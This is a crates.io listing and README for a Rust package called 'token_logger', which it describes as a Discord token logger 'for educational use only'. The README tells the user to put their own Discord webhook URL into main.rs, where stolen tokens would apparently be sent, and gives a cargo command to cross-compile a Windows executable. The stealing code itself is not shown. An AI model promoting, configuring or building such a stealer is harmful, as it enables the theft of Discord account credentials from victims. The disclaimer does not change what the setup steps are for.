| Crates.io | token_logger |
| lib.rs | token_logger |
| version | 2.0.1 |
| created_at | 2022-08-17 23:42:02.462281+00 |
| updated_at | 2022-09-03 20:30:06.210083+00 |
| description | A discord token logger written in rust, DO NOT RUN, for educational use only |
| homepage | |
| repository | |
| max_upload_size | |
| id | 647815 |
| size | 63,100 |
On line 7 in main.rs (shown below) you must replace the variable with your webhook url
let url = "Discord Webhook URL";
To build just do
$ cargo build --target x86_64-pc-windows-gnu
Sidenote, I hate strings.